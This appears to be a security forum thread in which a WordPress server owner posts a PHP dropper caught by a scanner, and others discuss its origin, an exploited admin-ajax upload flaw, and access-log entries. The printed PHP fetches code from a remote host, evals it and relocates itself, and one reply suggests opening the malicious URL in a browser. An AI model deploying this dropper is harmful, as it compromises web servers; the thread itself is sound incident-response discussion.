FTL (1) Posted October 22 (edited)

Real time scanner on my Ubuntu 22.04 server that's used just to host WordPress sites found and deleted this bad boy. Contents of the file are as follows:

<?php
error_reporting(0);
// target directory inside WordPress core where the file will move itself
$HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/";
define('CUSTOM_FILE_PATH', $HomePath);
$file_path = __FILE__;
$file_name = basename($file_path);
// fetch a second-stage payload from the remote host (URL defanged as posted)
$ch = curl_init('hxxp://ndot.us/za');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
// execute whatever the remote server returned
eval('?>'.$result);
// move this file into wp-includes/Text/Diff/ under its own name
$customFilePath = CUSTOM_FILE_PATH . $file_name;
rename(__FILE__,$customFilePath);
?>

I've checked all sites' /wp-includes/Text/Diff directories and there are no new or modified files/folders in any of them. What would be my next steps? Thanks in advance.

Edited October 22 by FTL
itman (1,630) Posted October 22 (edited)

Access ndot.us/za in a browser on Windows and see what happens.

https://www.virustotal.com/gui/url/df38f83fac1af3dcc1a8c5380d99083d6ffa43ec6470c3bd433ed12541d1dc59/detection

Interestingly, ESET didn't block the code from being displayed.

Edited October 22 by itman
FTL (1) Posted October 22 (Author)

Chromium-based browsers just show the code on the page in plain text. Firefox shows the page formatted. I can't see anything happening when I hit the page. I have blocked outbound access to ndot.us now, but I'm just wondering whether anything has already happened, and if so, what?
itman (1,630) Posted October 22 (edited)

2 hours ago, FTL said:
    Firefox shows the page formatted

My FF 118.0.2 showed the code in plain text format. Note the modification author even stated who he is. Since this person has multiple scripts posted at GitHub, I assume this is where it originated from.

Edited October 22 by itman
itman (1,630) Posted October 22

ESET is now finally blocking the domain. Also of interest: this domain won't scan at Sucuri. It reports that the web site doesn't contain any data - go figure.
itman (1,630) Posted October 22

Believe I found the original code at GitHub: https://gist.github.com/kosinix/52c13666c5632dae559910dbfe180df2
Gregecslo (8) Posted October 23

Yes you did, I also found it. URLSCAN.IO shows multiple scans for this domain with different webshells hosted on it.

@FTL We also got this detection, but it's OK because, at least for us, the webserver returned 404 or 500 when the POST request was made (we do not host WordPress at all). So basically this is an automated script that tries to exploit some WordPress vulnerability and, if successful, curl downloads the webshell. Example:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And yes, the detection occurred on file:///tmp/phpMjc32fg, which is normal, because PHP processed this POST request. So in my opinion nothing happened with your server, but check where that POST request was made and make sure WP and plugins are up to date.
itman (1,630) Posted October 23

8 hours ago, Gregecslo said:
    Yes you did, I also found it.

The GitHub link I posted was to the original WP plug-in. My above posted screenshots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at GitHub, including reverse shell backdoors. So it appears this hack was very much an "off-the-shelf" one. The question is where was the modified WP plug-in acquired from?
Gregecslo (8) Posted October 23

This I don't know. For me, the detection came from this:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And it seems that the exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload

Again, I have NO WordPress site installed (but ESET did detect it anyway in PHP TEMP, which IS NORMAL); the server returns 404 or 500.... That's why I said that OP should check POST requests on the server...
FTL (1) Posted October 26 (Author)

So 4 times now I've had this file created and RTS delete it. All on different sites - but they are all up to date for both WordPress and all plugins. The server is up to date too. Same pesky IP as well, so that's blocked now, but that's not the answer, I know.

Site 1
95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 2
95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 3
95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 4
95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

How is this PITA managing to continually drop malicious PHP files into the tmp folder on the server? An in-depth scan of the server is clean.
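Gregecslo's suggestion in this thread is to go through the POST requests in the web server log rather than the temp folder. The following is an added example, not code posted by anyone in the thread: a small Python parser for the combined-format access-log lines quoted above that groups POSTs to admin-ajax.php by source IP and reports repeats, the status codes seen, and whether any attempt got a 2xx. The sample log is constructed from three of FTL's lines plus one benign line from a documentation-range IP.

```python
import re
from collections import defaultdict

# Combined/NCSA log format as written by Nginx and Apache (the shape of the lines in this thread).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: three of FTL's lines as posted in this thread plus one benign
# request from a documentation-range IP; nothing here is taken from a live server.
SAMPLE_LOG = """\
95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
203.0.113.10 - - [21/Oct/2023:18:40:01 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
"""


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def suspicious_posts(log_text, path="/wp-admin/admin-ajax.php", min_hits=2):
    """Group POSTs to `path` by source IP and report IPs seen at least `min_hits` times.

    Repeated 4xx/5xx from one IP is scanner noise; a 2xx in the same run is the
    case that warrants checking the site's upload and wp-includes directories.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            hits[rec["ip"]].append(rec["status"])
    report = {}
    for ip, statuses in hits.items():
        if len(statuses) >= min_hits:
            report[ip] = {
                "count": len(statuses),
                "statuses": sorted(set(statuses)),
                "any_success": any(200 <= s < 300 for s in statuses),
            }
    return report
```

Run it over the real access log with `suspicious_posts(open(path).read())`; an IP whose entry shows `any_success` is True is the one whose upload may actually have landed.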
Marcos (Administrators, 4,935) Posted October 26

Do you have Apache and PHP updated as well? You may want to take security measures for Apache and PHP, e.g. https://httpd.apache.org/docs/2.4/misc/security_tips.html and https://www.getastra.com/blog/php-security/php-security-guide/ for instance.
FTL (1) Posted October 26 (Author)

Hi Marcos, I use Nginx rather than Apache; both are on the latest stable versions, I believe.

nginx version: nginx/1.24.0
PHP 8.2.11 (cli) (built: Oct 6 2023 09:47:18) (NTS)
Marcos (Administrators, 4,935) Posted October 26

I would then contact a security company that audits websites.
Gregecslo (8) Posted October 27 (edited)

Quote:
    And yes, the detection occurred on file:///tmp/phpMjc32fg, which is normal, because PHP processed this POST request.
    Again, I have NO WordPress site installed (but ESET did detect it anyway in PHP TEMP, which IS NORMAL); the server returns 404 or 500....

If somebody makes a POST request with a malicious file inside the POST request, PHP will process it (execution is done in the PHP TMP folder), and that is where the detection comes from. This also happens to me on a server where nothing is installed but apache + php... Deleted ESET, the SAME POST request came, no files were dropped (but the file was naturally in PHP). The problem would be if you found an XXXX.php file which was dropped in the webserver folder...

Edited October 27 by Gregecslo
Gregecslo (8) Posted October 27

Something like this: https://octobercms.com/forum/post/being-attacked-please-help?page=1#post-37387